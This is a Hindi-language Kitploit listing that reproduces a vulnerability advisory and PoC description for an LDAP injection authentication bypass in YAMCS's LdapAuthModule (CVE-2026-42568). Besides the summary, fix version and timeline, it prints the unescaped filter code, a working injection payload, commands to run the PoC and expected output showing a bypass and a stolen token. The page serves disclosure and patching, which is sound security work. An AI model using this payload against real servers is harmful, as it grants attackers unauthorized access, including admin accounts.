Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-42568 — org.yamcs.security.LdapAuthModule में एक LDAP इंजेक्शन कमजोरी मौजूद है। उपयोगकर्ता नाम पैरामीटर को RFC 4515 एस्केपिंग के बिना सीधे LDAP खोज फ़िल्टर में डाला जाता है, जिससे प्रमाणीकरण बायपास संभव होता है। | Kitploit
उपकरण/GitHubGitHub/ex-cal1bur/cve-2026-42568
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षा
GitHubex-cal1bur/cve-2026-42568

CVE-2026-42568

org.yamcs.security.LdapAuthModule में एक LDAP इंजेक्शन कमजोरी मौजूद है। उपयोगकर्ता नाम पैरामीटर को RFC 4515 एस्केपिंग के बिना सीधे LDAP खोज फ़िल्टर में डाला जाता है, जिससे प्रमाणीकरण बायपास संभव होता है।

रिपॉजिटरी देखें
13 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-42568 — YAMCS में LDAP इंजेक्शन LdapAuthModule में

सारांश

org.yamcs.security.LdapAuthModule में एक LDAP इंजेक्शन भेद्यता मौजूद है। उपयोगकर्ता नाम पैरामीटर को RFC 4515 एस्केपिंग के बिना सीधे LDAP खोज फ़िल्टर में डाला जाता है, जिससे प्रमाणीकरण बाईपास संभव हो जाता है।

क्षेत्रमान
CVECVE-2026-42568
गंभीरतामध्यम
CWECWE-90: LDAP क्वेरी में विशेष तत्वों का अनुचित न्यूट्रलाइज़ेशन
प्रभावितyamcs-core < 5.12.7 (LDAP प्रमाणीकरण कॉन्फ़िगर किए जाने पर)
इसमें ठीक किया गयाyamcs-core 5.12.7
परामर्शGHSA-cqh3-jg8p-336j

भेद्यता विवरण

मूल कारण (LdapAuthModule.java):

root@kitploit:~
var filter = userFilter.replace("{0}", username);
// username inserted directly — no RFC 4515 escaping

एक सामान्य userFilter (uid={0}) के साथ, एक दुर्भावनापूर्ण उपयोगकर्ता नाम फ़िल्टर संरचना को तोड़ता है:

root@kitploit:~
इनपुट:  *)(uid=*))(|(uid=*
फ़िल्टर: (uid=*)(uid=*))(|(uid=*)
परिणाम: सार्वभौमिक मिलान — प्रमाणीकरण बाईपास हो गया

प्रूफ ऑफ कॉन्सेप्ट

root@kitploit:~
pip install requests
python3 poc.py http://localhost:8090

कमजोर इंस्टेंस पर अपेक्षित आउटपुट (LDAP कॉन्फ़िगर के साथ):

root@kitploit:~
[1] सार्वभौमिक बाईपास (कोई भी खाता)
     उपयोगकर्ता नाम: *)(uid=*))(|(uid=*
     पासवर्ड: anything
     परिणाम:   HTTP 200
     [!!!] प्रमाणीकरण बाईपास हो गया
     [!!!] टोकन प्राप्त हुआ: eyJhbGciOiJSUzI1NiJ9...

नोट: यह भेद्यता केवल YAMCS इंस्टेंस को प्रभावित करती है जिनमें LdapAuthModule कॉन्फ़िगर किया गया है। बिल्ट-इन प्रमाणीकरण का उपयोग करने वाले डिफ़ॉल्ट इंस्टॉलेशन प्रभावित नहीं होते हैं।

प्रभाव

एक अप्रमाणित हमलावर जो YAMCS सर्वर तक पहुंच सकता है, जब LDAP प्रमाणीकरण कॉन्फ़िगर किया जाता है, तो वह पूरी तरह से प्रमाणीकरण को बाईपास कर सकता है, और प्रशासकों सहित किसी भी उपयोगकर्ता के रूप में पहुंच प्राप्त कर सकता है।

समाधान

yamcs-core >= 5.12.7 में अपग्रेड करें।

फिक्स LDAP फ़िल्टर बनाने से पहले उपयोगकर्ता नाम पर RFC 4515 एस्केपिंग लागू करता है।

समयरेखा

दिनांकघटना
2026-05भेद्यता की सूचना दी गई
2026-05-26yamcs-core 5.12.7 में फिक्स जारी किया गया
2026-05-26सार्वजनिक परामर्श प्रकाशित किया गया

शोधकर्ता

Daniel Miranda Barcelona (Excal1bur)

  • GitHub: https://github.com/ex-cal1bur
  • LinkedIn: https://linkedin.com/in/daniel-miranda-barcelona
  • ब्लॉग: https://thedumpster.es
टूल डाउनलोड करें